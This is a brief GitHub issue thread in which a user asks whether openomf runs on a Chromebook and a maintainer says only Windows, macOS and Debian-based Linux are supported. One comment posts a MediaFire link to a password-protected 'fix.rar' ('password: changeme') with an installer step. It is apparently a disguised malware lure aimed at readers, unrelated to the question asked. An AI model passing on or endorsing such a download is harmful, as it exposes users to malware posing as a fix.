### ISSUE TITLE
Is there  an tab version?

### ISSUE THREAD

**Issue by DarkMemeGod411** [omf2097/openomf#544]
i want to load on chromebook

**Comment by katajakasa** [comment]
Nope, we only officially support windows, mac-os and debian based linux. Anything else you need to sort out yourself ;)

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by DarkMemeGod411** [comment]
ye the school wont let students open certain tabs, that's blocked. and i am mad abt it
